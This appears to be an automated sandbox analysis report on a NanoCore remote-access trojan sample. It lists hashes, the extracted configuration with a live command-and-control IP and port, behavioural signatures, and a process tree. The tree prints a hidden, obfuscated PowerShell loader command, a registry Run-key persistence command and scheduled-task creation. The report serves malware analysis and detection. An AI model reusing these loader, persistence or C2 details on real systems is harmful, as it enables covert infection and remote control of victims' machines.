Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
16-05-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
Resource
win7-20240221-en
General
-
Target
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe
-
Size
689KB
-
MD5
e0dfee6241128b7395b5fd0d8f6ebe20
-
SHA1
a1351dfa6c71e46c155f43e91538af2ababa5c5a
-
SHA256
a7904a9abf1b208434c7e06b7d7c0d86ff150660b436eebd5d2a837c1bc51e21
-
SHA512
06c609efa598c9df65cd2339dfa96d66658030fe9066daa7936a93de36c9026d822a7692f90e94b107b5fd7c6744091d7de5d943289f9078fa4aff44ca08e3b2
-
SSDEEP
12288:BEwtNzCu2HjdSqvXO6KoDP46aJkOReOjDSIWzRgmYW9+:6y/2DB+8XfORecSISRNYW9+
Malware Config
Extracted
nanocore
1.2.2.0
184.75.223.235:7425
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-02-09T12:58:05.780785736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
7425
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
08ef4235-7a50-4f21-9618-7cf8d1e59e43
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
184.75.223.235
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exeImagingDevices.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dveskolen = "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\\Ionized\\').Arbejdspligt;%Shoresman% ($Devoto)" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Subsystem = "C:\\Program Files (x86)\\SMTP Subsystem\\smtpss.exe" ImagingDevices.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
ImagingDevices.exepid process 2752 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeImagingDevices.exepid process 3064 powershell.exe 2752 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3064 set thread context of 2752 3064 powershell.exe ImagingDevices.exe -
Drops file in Program Files directory 2 IoCs
Processes:
ImagingDevices.exedescription ioc process File created C:\Program Files (x86)\SMTP Subsystem\smtpss.exe ImagingDevices.exe File opened for modification C:\Program Files (x86)\SMTP Subsystem\smtpss.exe ImagingDevices.exe -
Drops file in Windows directory 1 IoCs
Processes:
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exedescription ioc process File opened for modification C:\Windows\Ligaturers216\irkas.unm e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 448 schtasks.exe 2384 schtasks.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exeImagingDevices.exepid process 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 3064 powershell.exe 2752 ImagingDevices.exe 2752 ImagingDevices.exe 2752 ImagingDevices.exe 2752 ImagingDevices.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
ImagingDevices.exepid process 2752 ImagingDevices.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 3064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeImagingDevices.exedescription pid process Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2752 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exepowershell.exeImagingDevices.execmd.exedescription pid process target process PID 3452 wrote to memory of 3064 3452 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 3452 wrote to memory of 3064 3452 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 3452 wrote to memory of 3064 3452 e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe powershell.exe PID 3064 wrote to memory of 3288 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 3288 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 3288 3064 powershell.exe cmd.exe PID 3064 wrote to memory of 2752 3064 powershell.exe ImagingDevices.exe PID 3064 wrote to memory of 2752 3064 powershell.exe ImagingDevices.exe PID 3064 wrote to memory of 2752 3064 powershell.exe ImagingDevices.exe PID 3064 wrote to memory of 2752 3064 powershell.exe ImagingDevices.exe PID 3064 wrote to memory of 2752 3064 powershell.exe ImagingDevices.exe PID 2752 wrote to memory of 4364 2752 ImagingDevices.exe cmd.exe PID 2752 wrote to memory of 4364 2752 ImagingDevices.exe cmd.exe PID 2752 wrote to memory of 4364 2752 ImagingDevices.exe cmd.exe PID 4364 wrote to memory of 620 4364 cmd.exe reg.exe PID 4364 wrote to memory of 620 4364 cmd.exe reg.exe PID 4364 wrote to memory of 620 4364 cmd.exe reg.exe PID 2752 wrote to memory of 448 2752 ImagingDevices.exe schtasks.exe PID 2752 wrote to memory of 448 2752 ImagingDevices.exe schtasks.exe PID 2752 wrote to memory of 448 2752 ImagingDevices.exe schtasks.exe PID 2752 wrote to memory of 2384 2752 ImagingDevices.exe schtasks.exe PID 2752 wrote to memory of 2384 2752 ImagingDevices.exe schtasks.exe PID 2752 wrote to memory of 2384 2752 ImagingDevices.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\e0dfee6241128b7395b5fd0d8f6ebe20_NeikiAnalytics.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Hndelig=Get-Content 'C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.Ion';$Geocyclic=$Hndelig.SubString(53435,3);.$Geocyclic($Hndelig)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dveskolen" /t REG_EXPAND_SZ /d "%Shoresman% -windowstyle minimized $Devoto=(Get-ItemProperty -Path 'HKCU:\Ionized\').Arbejdspligt;%Shoresman% ($Devoto)"5⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SMTP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp304.tmp"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "SMTP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3EF.tmp"4⤵
- Creates scheduled task(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eusrb2ns.kqo.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp304.tmpFilesize
1KB
MD571ead0a0a3d5f5ab1c6fe7e937fbb0a7
SHA15ce6d119d57d1e536f5f8fe9b88e84bff5bc65f4
SHA256320e3d1c9de524bd09da80c102590ca1de02878947a5bd9cf6ce41ec80d627ef
SHA5125ff26e793041c37dee51b336e4b82bfc42b5a132b5a1bb975c7e201bedb3a384f3c44ed560b800a0b0830d2eaebd671288ab47f06cfe553da5a99b29ebeab3d0
-
C:\Users\Admin\AppData\Local\Temp\tmp3EF.tmpFilesize
1KB
MD50339b45ef206f4becc88be0d65e24b9e
SHA16503a1851f4ccd8c80a31f96bd7ae40d962c9fad
SHA2563d568a47a8944a47f4aed6982755ac7ff7dda469cc1c81c213ecaa5d89de1f83
SHA512c98f4513db34d50510dd986e0d812545c442bd5bef26932032b165759627fab4e00c95fe907ab3416a8a1042bfa77aa516c479f1ff7d1ec2f21ae66df8f72551
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\Appliceringernes.BraFilesize
327KB
MD53b52e8ccc5c3e79f2c3bd9878f7c72bd
SHA1d341fa8bdab55d08c942d45bd0cd2cf11d5b26e4
SHA256c5426f693d6484c5e42a66d03f3422587a4b328dc8432f305458d1e0f3e1ee78
SHA5126c78f6d5f1e5e4f983718e78fca14bab3e17c753cabe36c2f4e95be0406acdd32d980e2328640acb9eba439c26b5d268a1fbcfc3b4d5abf7970064f5b286dd19
-
C:\Users\Admin\AppData\Roaming\archprimate\sensationslysten\rippon.IonFilesize
52KB
MD51067aadf3627bd86f4048db52f577636
SHA1682d902c4223a31fb3abf3236194b177813d662f
SHA2560b4823813f85cbf0259d04a24fa6ee9dc00c612896201fdf1793928a3883c0d4
SHA512d9331366473d373535cca3db7b364fe3371cdef889be61cd052249ee42d1d1aae8da696dc88e2094bfda8eda2cda1b6da36e16cf5e5f92d66296941ec6aca377
-
memory/2752-68-0x0000000020EE0000-0x0000000020EFE000-memory.dmpFilesize
120KB
-
memory/2752-66-0x0000000020CE0000-0x0000000020CEA000-memory.dmpFilesize
40KB
-
memory/2752-58-0x000000001EB70000-0x000000001EB7A000-memory.dmpFilesize
40KB
-
memory/2752-67-0x0000000020CF0000-0x0000000020CFC000-memory.dmpFilesize
48KB
-
memory/2752-57-0x0000000020D10000-0x0000000020DAC000-memory.dmpFilesize
624KB
-
memory/2752-56-0x0000000020BD0000-0x0000000020C62000-memory.dmpFilesize
584KB
-
memory/2752-52-0x0000000000A60000-0x0000000001CB4000-memory.dmpFilesize
18.3MB
-
memory/2752-54-0x0000000000A60000-0x0000000000A9A000-memory.dmpFilesize
232KB
-
memory/2752-69-0x0000000021900000-0x000000002190A000-memory.dmpFilesize
40KB
-
memory/3064-17-0x00000000062F0000-0x0000000006644000-memory.dmpFilesize
3.3MB
-
memory/3064-24-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-28-0x0000000007ED0000-0x0000000008474000-memory.dmpFilesize
5.6MB
-
memory/3064-26-0x0000000006DF0000-0x0000000006E0A000-memory.dmpFilesize
104KB
-
memory/3064-30-0x0000000008B00000-0x000000000917A000-memory.dmpFilesize
6.5MB
-
memory/3064-31-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-25-0x0000000007880000-0x0000000007916000-memory.dmpFilesize
600KB
-
memory/3064-33-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-34-0x0000000074FEE000-0x0000000074FEF000-memory.dmpFilesize
4KB
-
memory/3064-35-0x0000000009180000-0x0000000009D95000-memory.dmpFilesize
12.1MB
-
memory/3064-36-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-37-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-39-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-27-0x0000000006E40000-0x0000000006E62000-memory.dmpFilesize
136KB
-
memory/3064-23-0x0000000006990000-0x00000000069DC000-memory.dmpFilesize
304KB
-
memory/3064-55-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-22-0x0000000006900000-0x000000000691E000-memory.dmpFilesize
120KB
-
memory/3064-4-0x0000000074FEE000-0x0000000074FEF000-memory.dmpFilesize
4KB
-
memory/3064-11-0x0000000006280000-0x00000000062E6000-memory.dmpFilesize
408KB
-
memory/3064-10-0x0000000006210000-0x0000000006276000-memory.dmpFilesize
408KB
-
memory/3064-9-0x0000000005900000-0x0000000005922000-memory.dmpFilesize
136KB
-
memory/3064-8-0x0000000005BE0000-0x0000000006208000-memory.dmpFilesize
6.2MB
-
memory/3064-7-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-6-0x0000000074FE0000-0x0000000075790000-memory.dmpFilesize
7.7MB
-
memory/3064-5-0x00000000032E0000-0x0000000003316000-memory.dmpFilesize
216KB